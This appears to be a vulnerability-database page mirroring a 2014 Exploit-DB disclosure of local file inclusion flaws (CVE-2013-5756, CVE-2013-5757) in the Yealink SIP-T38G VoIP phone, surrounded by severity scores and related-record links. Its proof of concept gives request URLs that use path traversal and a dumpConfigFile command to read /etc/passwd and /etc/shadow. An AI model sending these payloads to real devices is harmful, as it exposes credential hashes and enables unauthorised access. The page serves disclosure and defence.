Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMr.Un1k0d3rEDB-ID:33740
HistoryJun 13, 2014 - 12:00 a.m.

Yealink VoIP Phone SIP-T38G - Local File Inclusion

2014-06-1300:00:00
Mr.Un1k0d3r
www.exploit-db.com
20

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.004 Low

EPSS

Percentile

73.5%

JSON
Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757

Description:

Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow

POC:
Using the page parameter (CVE-2013-5756):
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")

*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.

Related

packetstorm 2
exploitpack 2
seebug 2
openvas 1
zdt 1
cve 3
nvd 3
cvelist 3
prion 3
exploitdb 1
packetstorm
packetstorm
Yealink VoIP Phone SIP-T38G Local File Inclusion
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G Privilege Escalation
2014-06-13 00:00:00
exploitpack
exploitpack
Yealink VoIP Phone SIP-T38G - Local File Inclusion
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
seebug
seebug
Yealink VoIP Phone SIP-T38G - Local File Inclusion
2014-07-01 00:00:00
Yealink VoIP Phone SIP-T38G - Privileges Escalation
2014-07-01 00:00:00
openvas
openvas
Yealink VoIP Phone SIP-T38G Multiple Vulnerabilities
2014-06-20 00:00:00
zdt
zdt
Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities
2014-06-14 00:00:00
cve
cve
CVE-2013-5756
2014-08-03 18:55:04
CVE-2013-5757
2014-08-03 18:55:04
CVE-2013-5759
2014-08-03 18:55:04
nvd
nvd
CVE-2013-5756
2014-08-03 18:55:04
CVE-2013-5757
2014-08-03 18:55:04
CVE-2013-5759
2014-08-03 18:55:04
cvelist
cvelist
CVE-2013-5759
2014-08-03 18:00:00
CVE-2013-5757
2014-08-03 18:00:00
CVE-2013-5756
2014-08-03 18:00:00
prion
prion
Directory traversal
2014-08-03 18:55:00
Path traversal
2014-08-03 18:55:00
Design/Logic Flaw
2014-08-03 18:55:00
exploitdb
exploitdb
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.004 Low

EPSS

Percentile

73.5%

JSON
Related for EDB-ID:33740
packetstorm2exploitpack2seebug2openvas1zdt1cve3nvd3cvelist3prion3exploitdb1